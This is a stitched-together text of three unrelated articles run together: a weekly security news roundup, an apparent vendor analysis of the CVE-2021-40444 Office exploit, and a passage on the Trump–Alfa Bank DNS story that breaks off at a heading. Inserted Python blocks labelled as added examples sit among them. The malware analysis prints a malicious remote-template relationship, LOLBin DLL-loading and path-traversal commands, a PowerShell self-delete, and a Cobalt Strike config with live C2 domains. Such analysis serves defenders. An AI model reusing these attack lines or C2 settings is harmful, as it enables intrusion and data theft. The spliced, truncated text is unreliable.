The Good, the Bad and the Ugly in Cybersecurity – Week 39

The Good

As we’ve noted before, the proliferation of ransomware is predicated on, among other things, the use of cryptocurrencies to facilitate the ease of criminals to receive payment and launder their profits. So we were delighted to learn this week that the U.S. Treasury Department has taken the step of sanctioning a cryptocurrency exchange for its role in laundering cyber ransoms for groups such as Ryuk, Conti, and Maze.

SUEX OTC, S.R.O. (aka “SUCCESSFUL EXCHANGE”) was added to the Office of Foreign Assets Control’s (OFAC) list of specially designated nationals on Tuesday. The designation prevents any U.S. person or business from engaging in transactions with SUEX and blocks all SUEX assets that are subject to U.S. jurisdiction. Organizations that engage in transactions with SUEX could also face sanctions or be subject to enforcement action. Ransomware victims should be especially careful to note that they could face potential sanctions for facilitating a ransomware payment to a sanctioned entity, and OFAC has updated its guidance on this as well.

According to analysts, SUEX has received over $160 million in bitcoin from “illicit and high-risk sources” since 2018. Of that, $13 million is estimated to come from ransomware operators like Ryuk, Conti and Maze, $20 million from darknet markets, $24 million from scam operators, and $50 million from the illicit cryptocurrency exchange BTC-e, itself shut down in 2017 for laundering money for cybercriminals. The sanction against SUEX is a welcome step in cutting off cybercriminals’ access to easy payments. Let’s hope there’s more to come.

The Bad

Last week saw the beginning of a tough period for Apple with the FORCEDENTRY (aka CVE-2021-30860) exploit. Things have gone from bad to worse since then.

Thursday saw Apple backport a fix for FORCEDENTRY to iOS 12.5.4. It also released a patch for an entirely different zero-day (CVE-2021-30869) on macOS Catalina, warning that the company was aware of an in-the-wild exploit leveraging the privilege escalation in the XNU kernel.

Earlier in the week, a researcher dropped an interesting but not particularly dangerous macOS vulnerability that allows the unexpected execution of other files on the system.

A file with the .inetloc, .fileloc, .webloc, or .url extension can launch other executables on the system when double-clicked without first asking permission from the user.

URL
FiLe:////////////////////////System/Applications/Calculator.app

Reports that this could lead to remote code execution, however, were a little wide of the mark. The technique cannot be used to execute embedded code, though it could potentially be used to launch other files passed to the victim by an attacker. Such files themselves, however, could still trip over Gatekeeper, depending on the circumstances. Unconfirmed reports suggest the same researcher may have other, related bugs to reveal, so stay tuned for more on that.
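A small check for the pattern described above, added here as an example and not taken from the original post: it parses a location file's plist and reports whether the URL targets the local filesystem, treating the scheme case-insensitively (the proof of concept uses `FiLe:`) and collapsing the slash run so the real target is visible. The sample file is constructed.

```python
# Added example (not from the original post): inspect macOS location files
# (.inetloc, .webloc, .fileloc) and report URLs that point at the local filesystem.
import plistlib
from urllib.parse import urlsplit

# Constructed sample mirroring the proof of concept: odd-case scheme plus a long slash run.
SAMPLE_INETLOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>URL</key>
    <string>FiLe:////////////////////////System/Applications/Calculator.app</string>
</dict>
</plist>
"""


def make_location_file(url: str) -> bytes:
    """Build a location-file plist around a URL (used for the benign comparison case)."""
    return plistlib.dumps({"URL": url})


def inspect_location_file(data: bytes) -> dict:
    """Parse a location-file plist; flag file-scheme URLs, which open a local path on double-click."""
    plist = plistlib.loads(data)
    url = str(plist.get("URL", ""))
    parts = urlsplit(url)
    scheme = parts.scheme.lower()  # "FiLe" must still be treated as the file scheme
    if scheme == "file":
        # urlsplit leaves the extra slashes in the path; collapse them to show the real target.
        target = "/" + parts.path.lstrip("/")
    else:
        target = parts.path
    return {"url": url, "scheme": scheme, "target": target, "local_launch": scheme == "file"}
```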

Of more immediate concern, particularly to iOS users, was a raft of zero days published this week expressly because the researcher felt that Apple had not acted fairly or transparently to his attempts at responsible disclosure. Some of these exploits allow an application to escape sandboxing and read potentially sensitive data from Mail, Health, and other apps.

Rounding out the week’s dire security news for the Cupertino company, a Spanish iOS researcher dropped yet another (albeit, minor) zero day citing similar reasons of disenchantment with Apple’s treatment of his bug bounty submissions.

All in all, quite a week of bad news for Apple and its customers. Let’s hope that relations between the company and security researchers take a turn for the better going forward.

The Ugly

More details have emerged around the story we reported on last week regarding REvil’s reemergence and the appearance of a universal decryptor for previous victims. It’s a story that brings into sharp relief the challenges faced by both law enforcement and victims when dealing with the ransomware threat.

According to a report, mitigation for the recent mass-scale ransomware campaign conducted by REvil against Kaseya and its clients was deliberately delayed by the FBI. The agency reportedly secretly acquired a universal decryptor but held onto it for three weeks rather than giving it to victims.

The FBI had hoped to conduct an operation that would disrupt or take down the REvil gang and did not want to reveal their hand by exposing their possession of the key. For three weeks, many victims including schools and hospitals struggled with the effects of the ransomware, and all told, businesses incurred millions of dollars in losses.

Balancing the immediate needs of victims against the longer-term payoff of putting a crimeware gang out of action is obviously a tough call, but it gets tougher when the strategy turns out to have been a flop.

By the time the FBI were ready to put their plan into action, the REvil gang had already done a disappearing act and the operation was no longer viable.

Strange coincidence or were the FBI’s operational plans themselves leaked by a hack? We’ll likely never know, but the end result is that the REvil gang is back in town, the FBI’s plan came to nothing, and a lot of victims are feeling the pain. Let’s hope the good guys have better luck next time.

Peeking into CVE-2021-40444 | MS Office Zero-Day Vulnerability Exploited in the Wild

Microsoft Office has long been a common attack vector, with abuse of its macro functionality a firm favorite of phishing and malspam attacks. These typically attempt to infect users through maliciously crafted Word or Excel files received as an attachment or as a download link via email. Macro-based attacks, however, require an extra social engineering step or two as such functionality has to be explicitly approved by the user on a per-document basis. CVE-2021-40444, however, is a Microsoft Office MSHTML Remote Code Execution Vulnerability that requires no macros and only a single approval to “display content”. Threat actors wasted no time in putting this zero day vulnerability to ill-use before Microsoft provided a fix in September’s Patch Tuesday. In this post, we provide a technical analysis of how this CVE is being exploited in the wild.

How Attackers Exploit CVE-2021-40444 In The Wild

Analysis of in-the-wild samples shows that, once approved, the malicious document exploiting CVE-2021-40444 loads remote HTML code with active JavaScript. The code is loaded into a “browser frame” which uses the mshtml.dll HTML Rendering library (one of the founding libraries of the old “Internet Explorer” Windows built-in browser).

A user who opens the malicious document will see a very short progress bar loading the remote content:

Once the remote content is downloaded, a normal Word document is displayed:

Looking at the .docx document relationships:

<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:hxxp://pawevi[.]com/e32c8df2cf6b7a16/specify.html!x-usc:hxxp://pawevi[.]com/e32c8df2cf6b7a16/specify.html" TargetMode="External"/>

The “document.xml” contains an htmlfile OLE object:

The attacking code dynamically creates a new HTMLFile ActiveX object in-memory and injects into it JavaScript code that loads an HTML ActiveX installation object. The new object downloads a remote compressed .cab archive (hxxp://hidusi[.]com/e8c76295a5f9acb7/ministry.cab or hxxp://pawevi[.]com/e32c8df2cf6b7a16/differ.cab) containing an .inf file called championship.inf, which is supposed to describe the object’s installation parameters, but in this case is used to disguise the attacker’s DLL payload.
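The relationship shown above can be found without ever opening the document. The scanner below is an added example (not SentinelOne's code): it reads every `.rels` part inside a `.docx` and flags external OLE-object relationships and `mhtml:`/`x-usc:` targets. The sample document is built in memory and reuses the defanged target from the post.

```python
# Added example (not SentinelOne's code): scan a .docx for the external mhtml
# OLE-object relationship pattern seen in CVE-2021-40444 documents.
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

# Constructed relationships part; the rId5 target is the defanged in-the-wild value from the post.
SAMPLE_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId5" Type="{OLE_TYPE}" Target="mhtml:hxxp://pawevi[.]com/e32c8df2cf6b7a16/specify.html!x-usc:hxxp://pawevi[.]com/e32c8df2cf6b7a16/specify.html" TargetMode="External"/>
</Relationships>
"""


def build_sample_docx() -> bytes:
    """Build a minimal in-memory .docx (a zip) containing the constructed relationships part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", SAMPLE_RELS)
    return buf.getvalue()


def find_suspicious_rels(docx_bytes: bytes) -> list:
    """Return relationships that are external OLE objects or use the mhtml:/x-usc: chain."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                external_ole = rel.get("Type") == OLE_TYPE and rel.get("TargetMode") == "External"
                # mhtml: scheme and the !x-usc: separator are the markers of the MIME-chaining trick.
                mhtml_chain = re.match(r"(?i)^mhtml:", target) is not None or "!x-usc:" in target.lower()
                if external_ole or mhtml_chain:
                    reasons = [label for label, hit in (("external-ole-object", external_ole),
                                                        ("mhtml-x-usc-target", mhtml_chain)) if hit]
                    findings.append({"part": name, "id": rel.get("Id"), "target": target, "reasons": reasons})
    return findings
```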

A snippet of the attacking code:

The attackers used a combination of old and new techniques. One old-school method involved mhtml (side.html, help.html, specify.html, mountain.html) to load MIME content (message/rfc822), which is structured like an email message and allows the attackers to retrieve encapsulated payload files without using traditional file downloads over HTTP.

This means that at least part of the payload will bypass most common web proxies, filtering and content validation systems.

Abusing LOLBins and Cobalt Strike with CVE-2021-40444

A classic characteristic of sophisticated attacks is the use of LOLBins (operating system built-in tools) to disguise the attack as normal system behavior. A well-known LOLBin is control.exe c:\windows\tasks\file.txt:evil.dll, which loads DLLs hidden inside an “Alternate Data Stream” (a file stream invisible to the Windows UI). The samples seen to date use this technique in combination with a .cpl extension and a “path traversal” to load a file written to disk by Microsoft Word.

This technique abuses the Windows control panel host control.exe to load the attackers’ championship.inf file. This file is typically dropped on disk at the following location (username elided):

C:\Users\<username>\appdata\roaming\temp\championship.inf

The malware can resolve the relative path to that location as

../../../../../Temp/championship.inf

The compilation date on observed samples was August 20, 2021, meaning this zero day exploit was in the wild at least 25 days before a patch was available.

The final payload is a Cobalt Strike Beacon DLL. Most observed samples communicate with a team server at /static-directory/media.gif and /static-directory/templates.gif to get the payload shellcode of type CobaltStrike_HTTPReverseShellcodex64.

Cobalt Strike Config:

{
  "BeaconType": [
    "HTTPS"
  ],
  "Port": 443,
  "SleepTime": 5000,
  "MaxGetSize": 2796542,
  "Jitter": 22,
  "C2Server": "dodefoh.com,/ml.html,joxinu.com,/hr.html",
  "HttpPostUri": "/ky",
  "Malleable_C2_Instructions": [
    "Remove 338 bytes from the beginning",
    "Base64 decode",
    "NetBIOS decode 'A'"
  ],
  "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==",
  "HttpGet_Verb": "GET",
  "HttpPost_Verb": "POST",
  "HttpPostChunk": 0,
  "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe",
  "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe",
  "CryptoScheme": 0,
  "Proxy_Behavior": "Use IE settings",
  "Watermark": 1580103814,
  "bStageCleanup": "True",
  "bCFGCaution": "False",
  "KillDate": 0,
  "bProcInject_StartRWX": "False",
  "bProcInject_UseRWX": "False",
  "bProcInject_MinAllocSize": 16583,
  "ProcInject_PrependAppend_x86": [
    "kJCQkJA=",
    "Empty"
  ],
  "ProcInject_PrependAppend_x64": [
    "kJCQkJA=",
    "Empty"
  ],
  "ProcInject_Execute": [
    "CreateThread",
    "CreateRemoteThread",
    "RtlCreateUserThread"
  ],
  "ProcInject_AllocationMethod": "VirtualAllocEx",
  "bUsesCookies": "True",
  "HostHeader": ""
}
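The Malleable_C2_Instructions above tell an analyst how to turn a captured server response back into beacon task data. The decoder below is an added example, not SentinelOne's or Cobalt Strike's code: it applies those three steps, with the NetBIOS decode taking the base letter from the instruction text (uppercase 'A' here). The sample body it decodes is constructed; the 338-byte filler and the task bytes are made up.

```python
# Added example (not SentinelOne's code): apply the extracted Malleable C2 transform
# to a server response so the embedded task data can be recovered for analysis.
import base64


def netbios_decode(data: bytes, base: int = ord("A")) -> bytes:
    """Undo NetBIOS encoding: each byte is sent as two letters, one per nibble,
    offset from 'A' (the uppercase variant) or 'a' (the lowercase variant)."""
    if len(data) % 2:
        raise ValueError("NetBIOS-encoded data must have even length")
    out = bytearray()
    for i in range(0, len(data), 2):
        hi, lo = data[i] - base, data[i + 1] - base
        if not (0 <= hi < 16 and 0 <= lo < 16):
            raise ValueError(f"non-NetBIOS byte pair at offset {i}")
        out.append((hi << 4) | lo)
    return bytes(out)


def netbios_encode(data: bytes, base: int = ord("A")) -> bytes:
    """Inverse of netbios_decode; used here only to build the constructed sample."""
    return bytes(b for byte in data for b in (base + (byte >> 4), base + (byte & 0xF)))


# Instruction list copied from the config above; the parser phrases each step in English.
INSTRUCTIONS = ["Remove 338 bytes from the beginning", "Base64 decode", "NetBIOS decode 'A'"]


def apply_instructions(body: bytes, instructions) -> bytes:
    """Run the decode steps in order; unknown steps raise rather than silently pass through."""
    for step in instructions:
        if step.startswith("Remove ") and step.endswith("from the beginning"):
            body = body[int(step.split()[1]):]
        elif step.startswith("Remove ") and step.endswith("from the end"):
            body = body[:-int(step.split()[1])]
        elif step == "Base64 decode":
            body = base64.b64decode(body)
        elif step.startswith("NetBIOS decode"):
            base = ord(step.split("'")[1])  # 'A' -> uppercase alphabet, 'a' -> lowercase
            body = netbios_decode(body, base)
        else:
            raise NotImplementedError(step)
    return body


def build_sample_body(task: bytes, padding_len: int = 338) -> bytes:
    """Constructed server response: padding_len bytes of decoy, then base64(netbios(task))."""
    filler = (b"<!-- decoy -->" * 40)[:padding_len]
    return filler + base64.b64encode(netbios_encode(task))
```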

The Cobalt Strike payload DLL was built using the Boost C++ framework and has lib_openssl (1.1.0f) statically compiled into it:

It downloads a remote shellcode:

The payload then uses WMI via COM (executed by the svchost.exe hosting RasMan [netsvcs]) to execute one of three built-in Windows apps:

On Windows 10, it’s usually wabmig.exe, the built-in “Windows Mail” application (%ProgramFiles%\windows mail\wabmig.exe). The payload DLL assumes SeDebugPrivilege and injects the shellcode into wabmig.exe. It then uses the same WMI process to run a PowerShell instance that deletes itself from the disk.

powershell -c "Sleep 5 ; Remove-Item -Path "C:\Users\..." -Force"

Execution Flow

WinWord.exe -> Control.exe -> rundll32.exe -> requests payload from hxxps://macuwuf[.]com/get_load (User Agent: "bumblebee") -> svchost.exe (Remote Access Connection Manager, "svchost.exe -k netsvcs") -> wmiprvse.exe (WMI) -> wabmig.exe ("Windows Mail") -> Code Injection ->

       Request: dodefoh[.]com/static-directory/media.gif
       Headers: (Host: microsoft.com Headers: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9) -> request "dodefoh[.]com/ml.html?dbprefix=false"
       Host: microsoft.com Connection: close Cookie: HSID=qa4NarNdu0U3b92eKlbW78+/fox2qG9E/+DLkr/F8TZ2N3a+n3wlLc1Z/Z3cRoKi68NNajtE14NxgljBdE8Y1hHYU5Ix4JH3xIkib6AaM404V4CW3ztax68SJPOsiKpWUaE/D46n2EPLDF7ZDFdcUV/7p95zuv322d/2d988ktya1gq1
       
       Request: joxinu.com/hr.html?dbprefix=false
       Headers: 
       Host: microsoft.com Connection: close Cookie: HSID=Oq81LSBcgwKkbuXZuVfuqFy+RsvlqVcDbOHz1SzEyXHlNk75DH0dal5YxdpPR7rleMJ1LahF78Tig2CG504gkYLZa9Wi4amwV4gaKDMbC8qrVrjRTDpigDwTHLQ/iZIRwqAHSB2m4ARYDWaen1ZkFsz6n5ngu8WxSt7OMEw9qpsJ1zLy
       
powershell.exe -> delete payload dll       
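The process chain in the flow above, together with the LOLBin usage described under “Abusing LOLBins” (control.exe loading an .inf through path traversal or an alternate data stream), expressed as rules over constructed Sysmon-style process-creation events. This is an added example and not SentinelOne's detection logic; the `ProcEvent` shape, PIDs and paths are assumptions, and the rundll32 command line is a constructed approximation.

```python
# Added example (not SentinelOne's code): rules for the WinWord -> control.exe -> rundll32
# -> WMI -> wabmig.exe -> powershell chain, run over constructed process-creation events.
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
CPL_HOSTS = {"control.exe", "rundll32.exe"}
ADS_RE = re.compile(r"(?i)[a-z]:\\[^\s:]+:[^\s\\]+\.(dll|cpl|inf)\b")  # c:\path\file.txt:evil.dll
TRAVERSAL_RE = re.compile(r"(?:\.\./|\.\.\\){2,}")                   # ../../Temp/championship.inf
SELF_DELETE_RE = re.compile(r"(?i)sleep\s+\d+\s*;\s*remove-item")     # delayed self-delete


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(events) -> list:
    """Return (pid, rule) pairs for every event that matches one of the chain rules."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        if name in CPL_HOSTS and pname in OFFICE:
            alerts.append((e.pid, "office-spawned-control-panel-host"))
        if name in CPL_HOSTS and (ADS_RE.search(e.cmdline) or TRAVERSAL_RE.search(e.cmdline)):
            alerts.append((e.pid, "cpl-ads-or-traversal"))
        if name == "wabmig.exe" and pname == "wmiprvse.exe":
            alerts.append((e.pid, "wmi-launched-wabmig"))
        if name == "powershell.exe" and SELF_DELETE_RE.search(e.cmdline):
            alerts.append((e.pid, "delayed-self-delete"))
    return alerts


# Constructed events following the chain in the post (PIDs, paths and user name are made up).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", '"WINWORD.EXE" /n report.docx'),
    ProcEvent(101, 100, r"C:\Windows\System32\control.exe", 'control.exe "../../../../../Temp/championship.inf"'),
    ProcEvent(102, 101, r"C:\Windows\System32\rundll32.exe",
              'rundll32.exe shell32.dll,Control_RunDLL "../../../../../Temp/championship.inf"'),
    ProcEvent(200, 1, r"C:\Windows\System32\wbem\WmiPrvSE.exe", "WmiPrvSE.exe"),
    ProcEvent(201, 200, r"C:\Program Files\Windows Mail\wabmig.exe", "wabmig.exe"),
    ProcEvent(202, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -c "Sleep 5 ; Remove-Item -Path C:\Users\victim\AppData\Roaming\Temp\championship.inf -Force"'),
]
```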

The wabmig.exe process sends an average of 400 HTTP GET requests of about 1.05 KB each, randomized between the two host names joxinu[.]com and dodefoh[.]com at /avatars, /ml.js?restart=false and /hr.html?dbprefix=false. It leaks information from the host as encrypted data wrapped in base64 in the HTTP header “HSID” (the Cookie: HSID= value in the trace above).

Environments that are not set up to scan GET requests at the gateway/proxy could easily overlook this traffic, or fail to recognize it as anomalous or malicious.
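The three things a proxy could key on in the traffic just described (a Host header that does not match the server actually contacted, an oversized base64-looking HSID cookie, and a large volume of near-identical GETs to a small set of hosts) as detection logic over constructed proxy log lines. Added example, not SentinelOne's code; the log format, thresholds and the cookie blob are assumptions.

```python
# Added example (not SentinelOne's code): flag the beacon's GET traffic in proxy logs.
import base64
import re
from collections import Counter

B64_RE = re.compile(r"^[A-Za-z0-9+/=]+$")
MIN_HSID_LEN = 64       # the observed beacon values run to well over 100 characters
BEACON_THRESHOLD = 50   # GETs per (client, host) pair in the analysed window


def parse_line(line: str) -> dict:
    """Constructed log format: client method dest_host uri host_header cookie."""
    client, method, dest, uri, host_hdr, cookie = line.split(" ", 5)
    return {"client": client, "method": method, "dest": dest, "uri": uri,
            "host_hdr": host_hdr, "cookie": cookie}


def cookie_value(cookie: str, name: str) -> str:
    for part in cookie.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return value
    return ""


def analyse(lines) -> dict:
    """Return (client, dest) pairs per finding type."""
    findings = {"host_mismatch": set(), "oversized_hsid": set(), "beaconing": set()}
    gets = Counter()
    for line in lines:
        r = parse_line(line)
        key = (r["client"], r["dest"])
        # The beacon sends Host: microsoft.com to a server that is not microsoft.com.
        if r["host_hdr"].lower() != r["dest"].lower():
            findings["host_mismatch"].add(key)
        hsid = cookie_value(r["cookie"], "HSID")
        if len(hsid) >= MIN_HSID_LEN and B64_RE.match(hsid):
            findings["oversized_hsid"].add(key)
        if r["method"] == "GET":
            gets[key] += 1
    findings["beaconing"] = {k for k, n in gets.items() if n >= BEACON_THRESHOLD}
    return findings


def build_sample_log() -> list:
    """Constructed lines: 400 beacon GETs alternating between the two C2 hosts from the post
    (defanged), plus ordinary traffic that must not be flagged."""
    hosts = ["dodefoh[.]com", "joxinu[.]com"]
    uris = ["/ml.html?dbprefix=false", "/hr.html?dbprefix=false", "/avatars", "/ml.js?restart=false"]
    blob = base64.b64encode(b"constructed exfil sample " * 4).decode()  # stand-in for the HSID value
    lines = [f"10.0.0.5 GET {hosts[i % 2]} {uris[i % 4]} microsoft.com HSID={blob}" for i in range(400)]
    lines.append("10.0.0.5 GET www.example.com /index.html www.example.com SESSION=abc123")
    lines.append("10.0.0.6 POST intranet.local /login intranet.local sid=1")
    return lines
```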

In the exfiltration part, one of the servers is typically in Germany and the other one is in the US.

Responses to Microsoft’s Patch for CVE-2021-40444

Since the discovery of the first samples, several exploit document builders have been published. These allow pentesters, defenders, and also lower caliber attackers to create exploit docs leveraging this vulnerability.

On the latest patch Tuesday (Sep 14, 2021), Microsoft released a patch for the CVE-2021-40444 vulnerability. Following the release of the patch, Microsoft published its own analysis of the attack using this exploit.

Chinese security researcher sunglin from the 404 Team of KnownSec has published a reverse engineering analysis of Microsoft’s patch which demonstrates how Microsoft implemented the fix, overwriting filenames containing a “/” with “\”.

New tricks are already being used to bypass signatures and static detections for this exploit: the first in-the-wild samples using XML entity encoding, and a technique that appears to bypass Windows Authenticode signature checking for .cab files larger than 1 GB.

On Sep 19, 2021, a new variant of this exploit was published. This new variant doesn’t require a .cab file for exploitation and instead uses a .wsf Windows script file to execute code. In addition, researchers have suggested connections between the threat actors and the Ryuk ransomware group, although the exact nature of the connection remains unclear.

Defending Against Exploitation of CVE-2021-40444

Despite the fact that Microsoft has patched the underlying vulnerability, many organizations remain vulnerable to this type of attack either through failing to update in a timely fashion or from new variants that don’t use a .cab file.

SentinelOne customers are protected against this and related attacks.

Conclusion

Targeted attacks exploiting CVE-2021-40444 have been seen in the wild and appear to be ongoing. Sectors including critical infrastructure like Energy, Finance, IT and Telecoms have all reportedly been targeted, among others. SentinelOne urges enterprise security teams to take appropriate measures to ensure they are protected against this attack vector. If you would like to know more about how SentinelOne can keep your business safe from this and other attacks, contact us for more information or request a free demo.

Indicators of Compromise


Indictment, Lawsuits Revive Trump-Alfa Bank Story

In October 2016, media outlets reported that data collected by some of the world’s most renowned cybersecurity experts had identified frequent and unexplained communications between an email server used by the Trump Organization and Alfa Bank, one of Russia’s largest financial institutions. Those publications set off speculation about a possible secret back-channel of communications, as well as a series of lawsuits and investigations that culminated last week with the indictment of the same former federal cybercrime prosecutor who brought the data to the attention of the FBI five years ago.

The first page of Alfa Bank’s 2020 complaint.

Since 2018, access to an exhaustive report commissioned by the U.S. Senate Armed Services Committee on data that prompted those experts to seek out the FBI has been limited to a handful of Senate committee leaders, Alfa Bank, and special prosecutors appointed to look into the origins of the FBI investigation on alleged ties between Trump and Russia.

That report is now public, ironically thanks to a pair of lawsuits filed by Alfa Bank, which doesn’t directly dispute the information collected by the researchers. Rather, it claims that the data they found was the result of a “highly sophisticated cyberattacks against it in 2016 and 2017” intended “to fabricate apparent communications” between Alfa Bank and the Trump Organization.

The data at issue refers to communications traversing the Domain Name System (DNS), a global database that maps computer-friendly coordinates like Internet addresses (e.g., 8.8.8.8) to more human-friendly domain names (example.com). Whenever an Internet user gets online to visit a website or send an email, the user’s device sends a query through the Domain Name System.

Many different entities capture and record this DNS data as it traverses the public Internet, allowing researchers to go back later and see which Internet addresses resolved to what domain names, when, and for how long. Sometimes the metadata generated by these lookups can be used to identify or infer persistent network connections between different Internet hosts.

The DNS strangeness was first identified in 2016 by a group of security experts who told reporters they were alarmed at the hacking of the Democratic National Committee, and grew concerned that the same attackers might also target Republican leaders and institutions.

Scrutinizing the Trump Organization’s online footprint, the researchers determined that for several months during the spring and summer of 2016, Internet servers at Alfa Bank in Russia, Spectrum Health in Michigan, and Heartland Payment Systems in New Jersey accounted for nearly all of the several thousand DNS lookups for a specific Trump Organization server (mail1.trump-email.com).

This chart from a court filing Sept. 14, 2021 shows the top sources of traffic to the Trump Organization email server over a four month period in the spring and summer of 2016. DNS lookups from Alfa Bank constituted the majority of those requests.

The researchers said they couldn’t be sure what kind of communications between those servers had caused the DNS lookups, but concluded that the data would be extremely difficult to fabricate.
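The two passive-DNS questions the researchers asked of the lookup data (which sources dominated the lookups for a name over a window, and who issued the very first lookup of a brand-new name), plus the post-deletion check the TDIP report later describes, as an added example that is not part of the article. All records, names, sources and timestamps below are constructed.

```python
# Added example (not from the article): passive-DNS analysis over constructed records.
# Record shape (assumed): (ISO timestamp, querying source network, queried name, answer).
from collections import Counter

OLD = "mail1.example.net"   # constructed stand-in for the original mail host name
NEW = "mail2.example.net"   # constructed stand-in for the replacement host name


def make_records() -> list:
    """Build a constructed data set: four months of lookups dominated by three sources,
    a deletion of the old name, then a single early lookup of the new name."""
    recs = []
    for day in range(120):
        date = f"2016-{4 + day // 30:02d}-{day % 30 + 1:02d}"
        hourly = [(h, "net-A") for h in range(1, 8)] + [(h, "net-B") for h in range(8, 11)] + [(11, "net-C")]
        for hour, src in hourly:
            recs.append((f"{date}T{hour:02d}:00:00", src, OLD, "198.51.100.7"))
        if day % 10 == 9:  # an occasional unrelated source
            recs.append((f"{date}T12:00:00", "net-X", OLD, "198.51.100.7"))
    # The old name's record is deleted; two sources keep asking for it afterwards.
    recs += [("2016-09-23T10:00:00", "net-A", OLD, "NXDOMAIN"),
             ("2016-09-23T21:30:00", "net-B", OLD, "NXDOMAIN"),
             ("2016-09-23T23:50:00", "net-A", OLD, "NXDOMAIN")]
    # Minutes later a brand-new name resolving to the same address is looked up, once, by net-A.
    recs += [("2016-09-23T23:58:00", "net-A", NEW, "198.51.100.7"),
             ("2016-10-05T09:00:00", "net-D", NEW, "198.51.100.7")]
    return recs


def lookup_share(records, qname, start, end) -> list:
    """Rank sources by lookups of qname within [start, end]; ISO timestamps sort as strings."""
    counts = Counter(src for ts, src, name, _ in records if name == qname and start <= ts <= end)
    total = sum(counts.values())
    return [(src, n, round(n / total, 3)) for src, n in counts.most_common()]


def first_lookup(records, qname):
    """Earliest record querying qname; the first lookup of a new name shows who already knew it."""
    hits = sorted(r for r in records if r[2] == qname)
    return hits[0] if hits else None


def lookups_after_deletion(records, qname, deleted_at) -> dict:
    """Which sources kept querying qname after its record was removed, and until when."""
    last = {}
    for ts, src, name, _ in records:
        if name == qname and ts > deleted_at:
            last[src] = max(last.get(src, ""), ts)
    return last
```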

As recounted in this 2018 New Yorker story, New York Times journalist Eric Lichtblau met with FBI officials in late September 2016 to discuss the researchers’ findings. The bureau asked him to hold the story because publishing might disrupt an ongoing investigation. On Sept. 21, 2016, Lichtblau reportedly shared the DNS data with B.G.R., a Washington lobbying firm that worked with Alfa Bank.

Lichtblau’s reporting on the DNS findings ended up buried in an October 31, 2016 story titled “Investigating Donald Trump, F.B.I. Sees No Clear Link to Russia,” which stated that the FBI “ultimately concluded that there could be an innocuous explanation, like marketing email or spam,” that might explain the unusual DNS connections.

But that same day, Slate’s Franklin Foer published a story based on his interactions with the researchers. Foer noted that roughly two days after Lichtblau shared the DNS data with B.G.R., the Trump Organization email server domain vanished from the Internet — its domain effectively decoupled from its Internet address.

Foer wrote that The Times hadn’t yet been in touch with the Trump campaign about the DNS data when the Trump email domain suddenly went offline. Odder still, four days later the Trump Organization created a new host — trump1.contact-client.com — and the very first DNS lookup to that new domain came from servers at Alfa Bank.

The researchers concluded that the new domain enabled communication to the very same server via a different route.

“When a new host name is created, the first communication with it is never random,” Foer wrote. “To reach the server after the resetting of the host name, the sender of the first inbound mail has to first learn of the name somehow. It’s simply impossible to randomly reach a renamed server.”

“That party had to have some kind of outbound message through SMS, phone, or some noninternet channel they used to communicate [the new configuration],” DNS expert Paul Vixie told Foer. “The first attempt to look up the revised host name came from Alfa Bank. If this was a public server, we would have seen other traces. The only look-ups came from this particular source.”

THE THEORIES

Both the Trump organization and Alfa Bank have denied using or establishing any sort of secret channel of communications, and have offered differing explanations as to how the data gathered by the experts could have been faked or misinterpreted.

In a follow-up story by Foer, the Trump Organization suggested that the DNS lookups might be the result of spam or email advertising various Trump properties, and said a Florida based marketing firm called Cendyn registered and managed the email server in question.

But Cendyn told CNN that its contract to provide email marketing services to the Trump Organization ended in March 2016 — weeks before the DNS lookups chronicled by the researchers started appearing. Cendyn told CNN that a different client had been communicating with Alfa Bank using Cendyn communications applications — a claim that Alfa Bank denied.

Alfa Bank subsequently hired computer forensics firms Mandiant and Stroz Friedberg to examine the DNS data presented by the researchers. Both companies concluded there was no evidence of email communications between Alfa Bank and the Trump Organization. However, both firms also acknowledged that Alfa Bank didn’t share any DNS data for the relevant four-month time period identified by the researchers.

Another theory for the DNS weirdness outlined in Mandiant’s report is that Alfa Bank’s servers performed the repeated DNS lookups for the Trump Organization server because its internal Trend Micro antivirus product routinely scanned domains in emails for signs of malicious activity — and that incoming marketing emails promoting Trump properties could have explained the traffic.

The researchers maintained this did not explain similar and repeated DNS lookups made to the Trump Organization email server by Spectrum Health, which is closely tied to the DeVos family (Betsy DeVos would later be appointed Secretary of Education by President Trump).

FISHING EXPEDITION

